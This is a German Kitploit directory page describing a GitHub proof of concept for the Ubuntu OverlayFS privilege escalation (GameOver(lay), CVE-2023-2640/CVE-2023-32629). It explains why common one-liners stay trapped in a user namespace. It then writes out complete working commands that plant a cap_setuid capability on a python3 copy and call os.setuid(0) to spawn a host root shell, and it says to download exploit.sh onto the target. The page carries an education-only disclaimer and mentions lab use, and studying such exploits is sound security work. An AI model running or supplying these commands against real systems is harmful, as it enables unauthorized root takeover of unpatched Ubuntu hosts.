Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-2640-CVE-2023-32629-Interactive-PoC — Ein sauberer, interaktiver mehrstufiger Exploit zur lokalen Privilegienausweitung (LPE) für Ubuntu OverlayFS (GameOver(lay)), der aus der User-Namespace-Sandbox ausbricht, um eine echte Host-Root-Shell zu erhalten. | Kitploit
Tools/GitHubGitHub/amar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubamar-imamovic/cve-2023-2640-cve-2023-32629-interactive-poc

CVE-2023-2640-CVE-2023-32629-Interactive-PoC

Ein sauberer, interaktiver mehrstufiger Exploit zur lokalen Privilegienausweitung (LPE) für Ubuntu OverlayFS (GameOver(lay)), der aus der User-Namespace-Sandbox ausbricht, um eine echte Host-Root-Shell zu erhalten.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 2 MonatenNoch nicht geprüft

CVE-2023-2640 & CVE-2023-32629 (GameOverLay) - PoC zur echten Root-Escape auf dem Host

Ein interaktiver, mehrstufiger Proof of Concept (PoC) zur lokalen Privilegienausweitung (Local Privilege Escalation, LPE), der sich gegen die OverlayFS-Schwachstellen des Ubuntu-Linux-Kernels (CVE-2023-2640 / CVE-2023-32629) richtet.

Im Gegensatz zu standardmäßigen automatisierten Einzeilern, die Ihre interaktive Shell in einem restriktiven User Namespace (Fake Root) gefangen halten, zerlegt diese Methodik die Exploit-Sequenz, um sicher eine echte, uneingeschränkte Host-Root-Shell zu erhalten.


Das Problem mit dem „Fake Root“ erklärt

Viele öffentliche Exploits kombinieren Einrichtung und Ausführung in einer einzigen automatisierten Shell-Sequenz wie dieser: unshare -rm sh -c "mkdir l u w m && ... && touch m/*; python3 -c '...'"

Da das Python-Ausführungspayload in die doppelten Anführungszeichen von unshare eingebettet ist, wird es intern innerhalb der User-Namespace-Sandbox ausgeführt.

  • Das Ergebnis: Ihre Benutzer-ID wird als uid=0(root) angezeigt, aber Ihre Shell ist kryptografisch vom Host isoliert. Wenn Sie versuchen, das Host-Root-Verzeichnis anzuzeigen (cd /root), erhalten Sie einen Permission Denied-Fehler.

Die Lösung

Dieser PoC zerlegt den Prozess in zwei klar getrennte logische Phasen:

  1. Innerhalb der Sandbox bewaffnen: Führen Sie unshare aus, um Root-Berechtigungen nur gerade lange genug vorzutäuschen, um den OverlayFS-Fehler ovl_copy_up auszunutzen und eine hochprivilegierte setcap cap_setuid+eip-Capability in einen lokalen Ordner mit Python-Binärdateien einzuschleusen.
  2. Außerhalb der Sandbox ausführen: Der Namespace schließt sich automatisch. Die mit einer Backdoor versehene Binärdatei wird dann direkt aus dem echten Host-Kontext als normaler unprivilegierter Benutzer ausgeführt. Der Kernel liest das durchgesickerte Flag, erlaubt os.setuid(0) und verleiht Ihnen echte Systemadministratorrechte auf Host-Ebene.

Details zu den Schwachstellen

  • CVE-2023-2640: Ubuntu-Kernel-OverlayFS schränkt Datei-Capabilities innerhalb von User Namespaces nicht korrekt ein.
  • CVE-2023-32629: Fehler in der Funktion ovl_copy_up_meta_inode_data des Ubuntu-Kernels, der es ermöglicht, Validierungsprüfungen während der Dateimigration vollständig zu umgehen.
  • Betroffene Systeme: Ubuntu 22.04 LTS mit Linux-Kernel-Versionen unterhalb von 6.2.0-26-generic.

Verwendungshinweise

Methode 1: Das automatisierte Skript (empfohlen)

  1. Klonen oder laden Sie exploit.sh auf das Zielsystem herunter (z. B. nach /tmp).
  2. Erteilen Sie ihm Ausführungsrechte und führen Sie es aus:
root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Methode 2: Manuelle interaktive Ausführung Zeile für Zeile

Wenn Sie über eine instabile Reverse Shell arbeiten, führen Sie diese Befehle vollständig getrennt aus und drücken Sie nach jeder Zeile Enter:

root@kitploit:~
# 1. Clean workspace environment 
cd /tmp && rm -rf l u w m

# 2. Forge the backdoor within the temporary namespace sandbox
unshare -rm sh -c "mkdir l u w m && cp /usr/bin/python3 l/ && setcap cap_setuid+eip l/python3 && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*"

# 3. Trigger execution on the real host to claim true root
./u/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Überprüfen Sie Ihre echten Berechtigungen, indem Sie Ihr aktuelles Benutzerprofil anzeigen:

root@kitploit:~
whoami
cat /root/root.txt

Credits & Danksagungen

Die grundlegenden Exploit-Mechanismen, die in diesem interaktiven Refactoring verwendet werden, wurden ursprünglich von den Sicherheitsforschern Liav Eliyahu und g1vi entdeckt und dokumentiert.

Haftungsausschluss

Dieses Repository wurde ausschließlich für Bildungszwecke, Sicherheitsforschung und autorisierte Penetrationstests (z. B. HackTheBox-/OffSec-Labore) erstellt. Der Autor übernimmt keine Haftung für Missbrauch, unbefugte Zugriffsversuche oder Infrastrukturschäden, die durch dieses Material verursacht werden. Verwenden Sie es verantwortungsbewusst.

Tool herunterladen